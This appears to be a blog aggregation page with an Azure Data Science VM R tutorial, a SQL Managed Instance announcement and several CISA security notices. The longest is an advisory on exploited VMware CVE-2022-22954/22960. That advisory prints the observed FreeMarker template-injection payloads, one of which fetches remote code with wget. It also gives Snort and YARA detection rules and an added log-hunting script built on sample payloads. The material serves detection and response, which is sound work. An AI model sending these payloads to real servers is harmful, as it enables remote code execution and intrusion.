by Contributed | May 20, 2022 | Technology
This article is contributed. See the original author and article here.
The Data Science Virtual Machine (DSVM) is a powerful data science development environment where you can perform data exploration and modeling tasks. The environment comes already built and bundled with several popular data analytics and data science tools that make it easy to get started without spending 20 min to 1 hour deploying a suitable infrastructure.
A new learning experience for R developers
We are also delighted to announce some exciting new updates that make R a first-class developer experience for learners on DSVMs and on Learn Sandboxes on MS Learn. Starting from April 2022, the DSVM offering has been enriched by DSVM for Windows 2019 v. 22.04.21 and DSVM for Ubuntu 20.04 and Ubuntu 18.04 v. 22.04.27, which provide an updated R environment including the following R libraries: Cluster, Devtools, Factoextra, Glue, Here, Ottr, Paletteer, Patchwork, Plotly, Rmd2jupyter, Scales, Statip, Summarytools, Tidyverse, Tidymodels and Testthat.
Getting started with R on DSVMs : a guided tutorial
But how can you start using R on DSVMs in your course or lab to perform data science tasks? Let's go through all the steps you'll need to create a DSVM on Azure and run an R Jupyter notebook.
1. First of all, you'll need an Azure subscription. If you don't have one yet, have a look at how to sign up for a free trial or at the offers dedicated to your students.
2. Sign in to the Azure Portal and search for “data science virtual machine”. Choose one of the resulting offerings by clicking on it. For this tutorial we will use Data Science Virtual Machine – Ubuntu 20.04.

3. Choose a resource group and the name of the VM you want to create, as well as the Azure subscription to which the machine will be billed. Select the datacenter region closest to your physical location. For a quicker setup, select "Password" as the authentication type, then specify the username and password you'll use to log in to your virtual machine. Keep in mind that these same credentials are accepted on the VM's internet-facing SSH and JupyterHub endpoints, so choose a strong password; an SSH public key is the safer choice for SSH access if you are comfortable managing one.

Click on Review + create and wait until the deployment has completed successfully.
4. There are different ways to access your DSVM. One of these is JupyterHub, a multi-user Jupyter server. To connect, open a web browser on your local machine and navigate to https://your-vm-ip:8000, replacing "your-vm-ip" with the IP address you can find in the overview section of your resource. JupyterHub on the DSVM uses a self-signed certificate, so expect a certificate warning from your browser the first time you connect; verify that the address you typed is really your VM's IP before accepting it.

5. At this point, you can sign in using the credentials you specified at the creation of the resource.

6. You’re now ready to start coding in R. You may browse the many sample notebooks that are available or you can create a new notebook by clicking on the R kernel button.

If you want more R code examples on data analysis and machine learning, have a look at the exercise units of this MS Learn path: Create machine learning models with R and tidymodels.
7. Remember to shut down your machine when you are not using it.
Note that if you are an educator and you want to use DSVMs for your R course, you can either provide the whole class with a single DSVM, sharing its credentials within the class, or give every student their own DSVM, choosing the trade-off between cost and flexibility that fits you. Bear in mind that with a single shared account there is no way to tell students' actions apart on the machine, and anyone holding the password can read, change or delete the other students' work.
Keep on learning
The example above covers only one of the possible functionalities enabled by DSVMs. You can also open a session in an interactive R console or code within RStudio, which is pre-installed in the VM. In addition, you can leverage other Azure services for data storage and modeling, and you can share code with your team by using GitHub and the pre-installed Git clients: Git Bash and Git GUI. Find more guidance in the DSVM documentation.
by Contributed | May 19, 2022 | Technology
Link feature for Managed Instance is a new feature providing a hybrid connection between SQL Server 2016 (Enterprise, Developer and Standard editions) hosted anywhere and the fully managed PaaS service Azure SQL Managed Instance, providing unprecedented hybrid flexibility and database mobility. With an approach that uses near real-time data replication to Azure using Always On technology, you can offload workloads to read-only secondaries on Azure to take advantage of a fully managed database platform, performance, and scale. The link can be operated for as long as you need it – months and years at a time, empowering you to get all the modern benefits of Azure today without migrating to the cloud. On your modernization journey, when and if you are ready to migrate to the cloud, the link de-risks your migration experience allowing you to validate your workloads in Azure prior to migrating with a seamless and instant experience, and at your own pace. In this episode of Data Exposed with Dani Ljepava and Anna Hoffman, you’ll dive deeper into the insights of this new feature.
Watch on Data Exposed
Resources:
Link feature for Azure SQL Managed Instance (preview)
View/share our latest episodes on Microsoft Docs and YouTube!
by Scott Muniz | May 19, 2022 | Security, Technology
The Internet Systems Consortium (ISC) has released a security advisory that addresses a vulnerability affecting version 9.18.0 of ISC Berkeley Internet Name Domain (BIND). A remote attacker could exploit this vulnerability to cause a denial-of-service condition.
CISA encourages users and administrators to review the ISC advisory for CVE-2022-1183 and apply the necessary update.
by Scott Muniz | May 19, 2022 | Security, Technology
CISA has released an analysis and infographic detailing the findings from the 112 Risk and Vulnerability Assessments (RVAs) conducted across multiple sectors in Fiscal Year 2021 (FY21).
The analysis details a sample attack path comprising 11 successive tactics, or steps, a cyber threat actor could take to compromise an organization with weaknesses that are representative of those CISA observed in FY21 RVAs. The infographic highlights the three most successful techniques for each tactic that the RVAs documented. Both the analysis and the infographic map threat actor behavior to the MITRE ATT&CK® framework.
CISA encourages network defenders to review the analysis and infographic and apply the recommended mitigations to protect against the observed tactics and techniques. For information on CISA RVAs and additional services, visit the CISA Cyber Resource Hub.
by Scott Muniz | May 18, 2022 | Security, Technology
The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Cybersecurity Advisory (CSA) to warn organizations that malicious cyber actors, likely advanced persistent threat (APT) actors, are exploiting CVE-2022-22954 and CVE-2022-22960 separately and in combination. These vulnerabilities affect certain versions of VMware Workspace ONE Access, VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation, and vRealize Suite Lifecycle Manager. Exploiting these vulnerabilities permits malicious actors to trigger a server-side template injection that may result in remote code execution (RCE) (CVE-2022-22954) or escalation of privileges to root (CVE-2022-22960).
VMware released updates for both vulnerabilities on April 6, 2022, and, according to a trusted third party, malicious cyber actors were able to reverse engineer the updates to develop an exploit within 48 hours and quickly began exploiting the disclosed vulnerabilities in unpatched devices. CISA was made aware of this exploit a week later and added CVE-2022-22954 and CVE-2022-22960 to its catalog of Known Exploited Vulnerabilities on April 14 and April 15, respectively. In accordance with Binding Operational Directive (BOD) 22-01, Reducing the Significant Risk of Known Exploited Vulnerabilities, federal agencies were required to apply updates for CVE-2022-22954 and CVE-2022-22960 by May 5 and May 6, 2022, respectively.
Note: based on this activity, CISA expects malicious cyber actors to quickly develop a capability to exploit newly released vulnerabilities CVE-2022-22972 and CVE-2022-22973 in the same impacted VMware products. In response, CISA has released Emergency Directive (ED) 22-03 Mitigate VMware Vulnerabilities, which requires emergency action from Federal Civilian Executive Branch agencies to either immediately implement the updates in VMware Security Advisory VMSA-2022-0014 or remove the affected software from their network until the updates can be applied.
CISA has deployed an incident response team to a large organization where the threat actors exploited CVE-2022-22954. Additionally, CISA has received information—including indicators of compromise (IOCs)—about observed exploitation at multiple other large organizations from trusted third parties.
This CSA provides IOCs and detection signatures from CISA as well as from trusted third parties to assist administrators with detecting and responding to this activity. Due to the rapid exploitation of these vulnerabilities, CISA strongly encourages all organizations with affected VMware products that are accessible from the internet, and that did not immediately apply updates, to assume compromise and initiate threat hunting activities using the detection methods provided in this CSA. If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA.
Download the PDF version of this report (pdf, 232kb).
For a downloadable copy of IOCs, see AA22-138B.stix
CISA has deployed an incident response team to a large organization where the threat actors exploited CVE-2022-22954. Additionally, CISA has received information about observed exploitation of CVE-2022-22954 and CVE-2022-22960 by multiple threat actors at multiple other large organizations from trusted third parties.
- CVE-2022-22954 enables an actor with network access to trigger a server-side template injection that may result in RCE. This vulnerability affects the following products:[1]
- VMware Workspace ONE Access, versions 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0
- vIDM versions 3.3.6, 3.3.5, 3.3.4, 3.3.3
- VMware Cloud Foundation, 4.x
- vRealize Suite LifeCycle Manager, 8.x
- CVE-2022-22960 enables a malicious actor with local access to escalate privileges to root due to improper permissions in support scripts. This vulnerability affects the following products:[2]
- VMware Workspace ONE Access, versions 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0
- vIDM, versions 3.3.6, 3.3.5, 3.3.4, 3.3.3
- vRA, version 7.6
- VMware Cloud Foundation, 3.x, 4.x
- vRealize Suite LifeCycle Manager, 8.x
According to trusted third-party reporting, threat actors may chain these vulnerabilities. At one compromised organization, on or around April 12, 2022, an unauthenticated actor with network access to the web interface leveraged CVE-2022-22954 to execute an arbitrary shell command as a VMware user. The actor then exploited CVE-2022-22960 to escalate the user’s privileges to root. With root access, the actor could wipe logs, escalate permissions, and move laterally to other systems.
Threat actors have dropped post-exploitation tools, including the Dingo J-spy webshell. During incident response activities, CISA observed, on or around April 13, 2022, threat actors leveraging CVE-2022-22954 to drop the Dingo J-spy webshell. Around the same period, a trusted third party observed threat actors leveraging CVE-2022-22954 to drop the Dingo J-spy webshell at one other organization. According to the third party, the actors may have also dropped the Dingo J-spy webshell at a third organization. Note: analysis of the first compromise and associated malware is ongoing, and CISA will update information about this case as we learn more.
Detection Methods
Signatures
Note: servers vulnerable to CVE-2022-22954 may use Hypertext Transfer Protocol Secure (HTTPS) to encrypt client/server communications. Secure Sockets Layer (SSL)/Transport Layer Security (TLS) decryption can be used as a workaround for network-based detection and threat hunting efforts.
The following CISA-created Snort signature may detect malicious network traffic related to exploitation of CVE-2022-22954:
alert tcp any any -> any $HTTP_PORTS (msg:"VMware:HTTP GET URI contains '/catalog-portal/ui/oauth/verify?error=&deviceUdid=':CVE-2022-22954"; sid:1; rev:1; flow:established,to_server; content:"GET"; http_method; content:"/catalog-portal/ui/oauth/verify?error=&deviceUdid="; http_uri; reference:cve,2022-22954; reference:url,github.com/sherlocksecurity/VMware-CVE-2022-22954; reference:url,github.com/tunelko/CVE-2022-22954-PoC/blob/main/CVE-2022-22954.py; priority:2; metadata:service http;)
The following third-party Snort signature may detect exploitation of VMware Workspace ONE Access server-side template injection:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Workspace One Serverside Template Injection"; content:"GET"; http_method; content:"freemarker.template.utility.Execute"; nocase; http_uri; priority:1; sid:10000001; rev:1;)
The following third-party YARA rule may detect unmodified instances of the Dingo J-spy webshell on infected hosts:
rule dingo_jspy_webshell
{
    strings:
        $string1 = "dingo.length"
        $string2 = "command = command.trim"
        $string3 = "commandAction"
        $string4 = "PortScan"
        $string5 = "InetAddress.getLocalHost"
        $string6 = "DatabaseManager"
        $string7 = "ExecuteCommand"
        $string8 = "var command = form.command.value"
        $string9 = "dingody.iteye.com"
        $string10 = "J-Spy ver"
        $string11 = "no permission ,die"
        $string12 = "int iPort = Integer.parseInt"
    condition:
        filesize < 50KB and 12 of ($string*)
}
Note: the Dingo J-spy webshell is an example of post-exploitation tools that actors have used. Administrators should examine their network for any sign of post-exploitation activity.
Behavioral Analysis and Indicators of Compromise
Administrators should conduct behavioral analysis on root accounts of vulnerable systems by:
- Using the indicators listed in table 1 to detect potential malicious activity.
- Reviewing system logs and gaps in logs.
- Reviewing abnormal connections to other assets.
- Searching the command-line history.
- Auditing running processes.
- Reviewing local user accounts and groups.
- Auditing active listening ports and connections.
Table 1: Third-party IOCs for Exploitation of CVE-2022-22954 and CVE-2022-22960

| Indicator | Comment |
| --- | --- |
| IP Addresses | |
| 136.243.75[.]136 | On or around April 12, 2022, malicious cyber actors may have used this German-registered IP address to conduct the activity. However, the actors may have used the Privax HMA VPN client to conduct operations. |
| Scanning, Exploitation Strings, and Commands Observed | |
| catalog-portal/ui/oauth/verify | |
| catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cat /etc/hosts")} | |
| /catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("wget -U "Hello 1.0" -qO - http://[REDACTED]/one")} | |
| freemarker.template.utility.Execute | Search for this function in /opt/vmware/horizon/workspace/logs/greenbox_web.log. freemarker.template.utility.Execute may appear in legitimate traffic but can also indicate malicious shell commands. |
| /opt/vmware/certproxy/bin/certproxyService.sh | Check for commands placed into this script; CVE-2022-22960 allows a local user to write to it, and it is executed as root. |
| /horizon/scripts/exportCustomGroupUsers.sh | Check for commands placed into this script; CVE-2022-22960 allows a local user to write to it, and it is executed as root. |
| /horizon/scripts/extractUserIdFromDatabase.sh | Check for commands placed into this script; CVE-2022-22960 allows a local user to write to it, and it is executed as root. |
| Files | |
| horizon.jsp | Found in /usr/local/horizon/workspace/webapps/SAAS/horizon/js-lib |
| jquery.jsp | Found in /usr/local/horizon/workspace/webapps/SAAS/horizon/js-lib |
| Webshells | |
| jspy | |
| godzilla | |
| tomcatjsp | |
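The following Python script is an added example, not part of the CISA advisory, that turns the detection logic of the Snort signatures and the strings in Table 1 into a log hunt: it decodes each greenbox_web.log line (twice, so double-encoded payloads still resolve), looks for the freemarker.template.utility.Execute marker, pulls out the shell command from the ${"..."?new()("...")} wrapper, and flags requests from the Table 1 address after refanging it. The sample log lines, their timestamp/IP/method/URI layout, and the 203.0.113.9 download host are constructed for the example; the real greenbox_web.log layout is not specified in the advisory, which is why matching is done on substrings rather than fixed columns.

```python
"""Added example (not from the CISA advisory): hunt a Workspace ONE Access
greenbox_web.log for CVE-2022-22954 template-injection attempts.

Assumptions (not stated by the advisory):
  - each log line carries the client IP and the request URI somewhere on it;
    the exact greenbox_web.log layout is not given, so we match substrings
  - the SAMPLE_LOG lines below are constructed, not real log data
"""
import re
from urllib.parse import unquote

# Request path named in the advisory's Snort signature and in Table 1
VULN_URI = "/catalog-portal/ui/oauth/verify"
# FreeMarker class the public exploits instantiate to run shell commands
EXEC_MARKER = "freemarker.template.utility.Execute"
# ${"freemarker.template.utility.Execute"?new()("<command>")}
# The lazy (.*?) is anchored by the closing )} so a command that itself
# contains quotes (the advisory's wget -U "Hello 1.0" case) is captured whole.
PAYLOAD_RE = re.compile(
    r'\$\{\s*"' + re.escape(EXEC_MARKER) + r'"\s*\?new\(\)\s*\(\s*"(.*?)"\s*\)\s*\}',
    re.S,
)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def refang(ioc):
    """Turn the advisory's defanged form 136.243.75[.]136 into a comparable address."""
    return ioc.replace("[.]", ".")


# IOC taken from Table 1 of the advisory
KNOWN_BAD_IPS = {refang("136.243.75[.]136")}


def analyse_line(line):
    """Return a finding dict for one log line, or None if no Execute marker is present.

    unquote() is applied twice so that '%2524'-style double encoding of the
    '${' wrapper still decodes to the plain marker before matching.
    """
    decoded = unquote(unquote(line))
    if EXEC_MARKER not in decoded:
        return None
    m = PAYLOAD_RE.search(decoded)
    ip_match = IPV4_RE.search(line)          # first IPv4 on the raw line = client IP (assumption)
    src_ip = ip_match.group(0) if ip_match else None
    return {
        "src_ip": src_ip,
        "vuln_path": VULN_URI in decoded,
        "command": m.group(1) if m else None,  # None: marker seen, payload shape not recognised
        "known_bad_ip": src_ip in KNOWN_BAD_IPS,
    }


def hunt(lines):
    """Run analyse_line over an iterable of log lines and return the findings in order."""
    return [f for f in (analyse_line(l) for l in lines) if f is not None]


# Constructed sample lines (layout is an assumption; 203.0.113.9 is a TEST-NET placeholder)
SAMPLE_LOG = [
    '2022-04-12 10:01:07 10.0.0.5 GET /SAAS/auth/login 200',
    '2022-04-12 10:02:11 136.243.75.136 GET /catalog-portal/ui/oauth/verify?error=&deviceUdid='
    '${"freemarker.template.utility.Execute"?new()("cat /etc/hosts")} 400',
    '2022-04-12 10:02:15 136.243.75.136 GET /catalog-portal/ui/oauth/verify?error=&deviceUdid='
    '${"freemarker.template.utility.Execute"?new()("wget -U "Hello 1.0" -qO - http://203.0.113.9/one")} 400',
    '2022-04-12 10:03:40 198.51.100.7 GET /catalog-portal/ui/oauth/verify?error=&deviceUdid='
    '%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22id%22%29%7D 400',
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        flag = " (Table 1 IOC)" if f["known_bad_ip"] else ""
        print(f'{f["src_ip"]}{flag}: {f["command"]}')
```

Run it against the real file with `hunt(open("/opt/vmware/horizon/workspace/logs/greenbox_web.log"))` and treat every hit as a compromise indicator: the marker alone tells you the template injection was attempted, and the extracted command tells you what to look for next (downloaded files, webshells in js-lib, edits to the CVE-2022-22960 support scripts). The regex only recognises the `?new()("...")` wrapper used in the public exploits, so a line with the marker but no parsed command still deserves manual review.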
Incident Response
If administrators discover system compromise, CISA recommends they:
- Immediately isolate affected systems.
- Collect and review relevant logs, data, and artifacts.
- Consider soliciting support from a third-party incident response organization to provide subject matter expertise, ensure the actor is eradicated from the network, and avoid residual issues that could enable follow-on exploitation.
- Report incidents to CISA via CISA's 24/7 Operations Center (report@cisa.gov or 888-282-0870).
CISA recommends organizations update impacted VMware products to the latest version or remove impacted versions from organizational networks. CISA does not endorse alternative mitigation options. As noted in ED 22-03 Mitigate VMware Vulnerabilities, CISA expects malicious cyber actors to quickly develop a capability to exploit newly released vulnerabilities CVE-2022-22972 and CVE-2022-22973 in the same impacted VMware products. ED 22-03 directs all Federal Civilian Executive Branch agencies to enumerate all instances of impacted VMware products and deploy updates in VMware Security Advisory VMSA-2022-0014 or to remove the affected software from the agency network until the updates can be applied.